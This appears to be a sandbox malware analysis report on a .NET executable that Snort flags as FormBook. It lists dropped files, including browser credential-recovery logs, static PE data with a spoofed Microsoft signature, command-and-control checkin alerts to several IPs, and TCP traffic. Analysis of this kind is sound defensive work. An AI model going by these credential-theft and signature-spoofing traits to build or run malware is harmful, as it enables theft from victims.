                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\dasherSettingSchema.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):854
                                Entropy (8bit):4.284628987131403
                                Encrypted:false
                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                Malicious:false
                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\eventpage_bin_prod.js

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with very long lines (4369)
                                Category:dropped
                                Size (bytes):101461
                                Entropy (8bit):5.397102915873049
                                Encrypted:false
                                SSDEEP:1536:rheqmDIrJJ9WtwoBQJVrMt0bLmuC/iqiP08Du3SPqFKfih9exJZb+5:2EYBQJVOV/iqWDZPqFt0M5
                                MD5:59076AAB2186365E9892E4F465855149
                                SHA1:7928E5F1B3F9D34B00865D91E36786C978F44EF2
                                SHA-256:AC51EAA606C3DBB06839E86D67003CD072D251305E2C67E3C92FDE080896653A
                                SHA-512:15085F01758B0EC636A69455B57946B1867700FCBD256EC52EC0CEED9F68F569ED0B92942998D4C88E4B1CA25A58A934D2EF88C23F3415A697575CA4B515E63B
                                Malicious:false
                                Preview:'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\manifest.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2397
                                Entropy (8bit):5.423941875432813
                                Encrypted:false
                                SSDEEP:24:1HEZ4qW4VlELb/KxktGu7VwELb/s2QDkUpvdlmF1exy/Otj1vJSVvs:W7WsaLTKQGuxTLT2Rv3mves/OPhSVk
                                MD5:D5C2307E326E9CDD9F3FB44D5389D968
                                SHA1:F7E51ABD69BBF3DEB17C2159946B189C35DB0F72
                                SHA-256:7A80C8C6EF18A27ECC31AF7CDB0E26C4CD756009202B45F79F4D3FB372B72B3E
                                SHA-512:038A0379AD7DF393332BDC985257EADE55B50C30BC5A90C32D6B9D626639AD7FB8DB5D0B1FEFCF99DD5C978646091E1EFF38552DC6C891F192D1037224488529
                                Malicious:false
                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "persistent": false,.. "scripts": [ "eventpage_bin_prod.js" ].. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": "script-src 'self'; object-src 'self'",.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "matches": [ "htt

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\page_embed_script.js

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):291
                                Entropy (8bit):4.644891151983713
                                Encrypted:false
                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK6M23:2Q8KVqb2u/Rt3OnjI
                                MD5:EE9839F99DED6F38DC561DB846B51E80
                                SHA1:DD2128A473C2FF47471400C81EFF416285DE606E
                                SHA-256:06E08E421EB7F0FE7959D68E27D40A9146A54503090D95CFAC6F2FFD72A78769
                                SHA-512:C8D77607F00CB8012CD056CE61CB77918EC43621270511303E09577F89CC57D4954E22E2C8C3FB1029AAE29F8142DAAE2E938CD5590AD0E5DE6DB1208AFEF874
                                Malicious:false
                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=2;}).call(this);.

                                C:\Users\user\AppData\Roaming\260P27U-\260logim.jpeg

                                Download File
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                Category:dropped
                                Size (bytes):89830
                                Entropy (8bit):7.843727464517177
                                Encrypted:false
                                SSDEEP:1536:CJ24dtBHS/W0d0hbbSbaA2+WS3KGTOpkhgOaE9/V5FBijKM8llllaIKR2l8/2:H4dtm0h/EaA2+WS3KZkhgO19/DO9bHO
                                MD5:158D3E34A2C1FB1B7910FB890CAF4C4C
                                SHA1:BBCBFCEF08FCE44B19F2301EDAF1E97E968CE9F5
                                SHA-256:3C06BDF9CDB31BC804D1EDFFE5212F8E0FCA395762F5F982696E86A6845A43A4
                                SHA-512:E85B84BE39D105F2FDC96F27535D13B24894445BDB595E58E12B4E4B6C7E6733789ADF3C6F163FE1D8F600A0B2F151029BED33A584EBC70AAD3A8EDDEFF9EA68
                                Malicious:false
                                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

                                C:\Users\user\AppData\Roaming\260P27U-\260logrg.ini

                                Download File
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                Category:dropped
                                Size (bytes):38
                                Entropy (8bit):2.7883088224543333
                                Encrypted:false
                                SSDEEP:3:rFGQJhIl:RGQPY
                                MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                Malicious:false
                                Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                C:\Users\user\AppData\Roaming\260P27U-\260logri.ini

                                Download File
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):2.8420918598895937
                                Encrypted:false
                                SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                Malicious:true
                                Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                C:\Users\user\AppData\Roaming\260P27U-\260logrv.ini

                                Download File
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):2.96096404744368
                                Encrypted:false
                                SSDEEP:3:AJlbeGQJhIl:tGQPY
                                MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                Malicious:true
                                Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

                                C:\Windows\appcompat\Programs\Amcache.hve

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.466149925859053
                                Encrypted:false
                                SSDEEP:6144:hIXfpi67eLPU9skLmb0b4IWSPKaJG8nAgejZMMhA2gX4WABl0uNgdwBCswSb0:iXD94IWlLZMM6YFHy+0
                                MD5:D89E393AB20C9E2434A546C66F8B1064
                                SHA1:EECD8AA361151FC87A4C64D5D32F402E7C511F4D
                                SHA-256:73B82C212B23F71A7D02BE807C661C5B2FE97EA0151F2A480FA9D7394950486A
                                SHA-512:312D4EB88D0742098973719AC5C4F9A14BE5B66DFB22341CA46168B135B7901DAF4515E06BDF09B30C57C5A85B09FFAA5706B8863DB929E68C7F0006CA70DC1E
                                Malicious:false
                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.................................................................................................................................................................................................................................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.973209222952696
                                TrID:
                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                • Win64 Executable GUI (202006/5) 46.43%
                                • Win64 Executable (generic) (12005/4) 2.76%
                                • Generic Win/DOS Executable (2004/3) 0.46%
                                • DOS Executable Generic (2002/1) 0.46%
                                File name:#U0426#U0438#U0442#U0430#U0442#U0430.exe
                                File size:575'728 bytes
                                MD5:84144b6048277290bb6eb647bbc5ad2a
                                SHA1:609a26e95e4b343bfb47ab51bdd68ef9a8ef791f
                                SHA256:151bfa7336a9c96e65bf8a0eeb54a3d34665e612c8c5b3a7886f16a6f58277c4
                                SHA512:792f0c22ed8aef3766f773f4c49698e9d2d2678191c98493e83076fa90dc8a83d67cdd00fe46d7409b4eeb1539c542cd0219b4b9121d45ecbb0ec0ac3bd94baa
                                SSDEEP:12288:R+vLWa44/RYO83ksdpiVRkvZU08wvzTIVodNgvBqk0WFLehfK2iE3LKvmbrJ:E44/Ky7MN7LT4vBqkle1FPbKSd
                                TLSH:BAC4234959DC8332DDAB473666BBD2C10734B7063986AE293CE824513C5E3D05BB27AE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&............."...0..x............... ....@...... ..............................Xq....`................................

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x400000
                                Entrypoint Section:
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:C=RU, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 22/05/2024 08:34:07 22/05/2025 08:34:07
                                Subject Chain
                                • C=RU, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                Version:3
                                Thumbprint MD5:4671A321FAF6E789481C96779E6BF18C
                                Thumbprint SHA-1:4152F4CD944747A079826DC4BE1319FC1975DD7A
                                Thumbprint SHA-256:90E3D3140C20C1745FD4573CAB1965319C03BBD0562886EC7F6F5E7906715D67
                                Serial:445822D9C199F35AF3BF4C72F8FBC0EF

                                Entrypoint Preview

                                Instruction
                                dec ebp
                                pop edx
                                nop
                                add byte ptr [ebx], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x760.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x8b0100x18e0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x98980x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x78b40x7a0081c1bf05aa7274f8f16d32e9f22bd1a5False0.4681416495901639data5.757043602973376IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xa0000x7600x800faef9ea4895b550d5dc16709f3d795e8False0.2529296875data3.7394591731117988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0xa0700x378data0.49324324324324326
                                RT_VERSION0xa3e80x378dataEnglishUnited States0.4954954954954955

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/27/24-08:44:12.485707TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.43.33.130.190
                                05/27/24-08:45:34.816913TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985580192.168.2.415.197.142.173
                                05/27/24-08:45:14.403891TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985380192.168.2.418.143.129.199
                                05/27/24-08:43:11.099341TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984680192.168.2.466.29.149.193
                                05/27/24-08:44:54.353420TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985180192.168.2.438.174.75.236
                                05/27/24-08:46:38.965412TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986080192.168.2.4217.160.0.14
                                05/27/24-08:45:55.375437TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985780192.168.2.491.195.240.19

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 27, 2024 08:42:39.695899010 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:39.695983887 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:39.696202993 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:39.696398020 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:39.696434021 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:39.925642967 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:39.925689936 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:39.925777912 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:39.925961971 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:39.925983906 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:39.926806927 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:39.926887989 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:39.926973104 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:39.927120924 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:39.927143097 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.258279085 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.258333921 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.258415937 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.258909941 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.258932114 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.391953945 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.392421007 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.392482042 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.394134998 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.394248009 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.395250082 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.395354986 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.395452023 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.395469904 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.396116972 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.396404982 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.396426916 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.399974108 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.400140047 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.401079893 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.401209116 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.401257992 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.438035965 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.438273907 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.438308954 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.439075947 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.439177990 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.440073967 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.440160036 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.440175056 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.442106009 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.442222118 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.442392111 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.442405939 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.507797003 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.507955074 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.509629011 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.509670019 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.525808096 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.525965929 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.526479006 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.526492119 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.628458977 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.702945948 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.702997923 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.703052998 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.703082085 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.705602884 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.705682039 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.705699921 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.711638927 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.711705923 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.711719990 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.717644930 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.717699051 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.717713118 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.723704100 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.723773956 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.723793983 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.729746103 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.729820013 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.729837894 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.730285883 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.730618000 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.730678082 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.734285116 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.734388113 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.735843897 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.735886097 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.735935926 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.736011028 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.736011982 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.736028910 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.736035109 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.741940975 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.742149115 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.742163897 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.742338896 CEST49761443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.742399931 CEST44349761172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.742503881 CEST49761443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.742847919 CEST49761443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.742883921 CEST44349761172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.791692019 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.791802883 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.791866064 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.791968107 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.792150021 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.792167902 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.797982931 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.798047066 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.798060894 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.804035902 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.804102898 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.804116011 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.810194969 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.810251951 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.810267925 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.816261053 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.816338062 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.816351891 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.822240114 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.823051929 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.823066950 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.828507900 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.828818083 CEST49755443192.168.2.4142.250.184.225
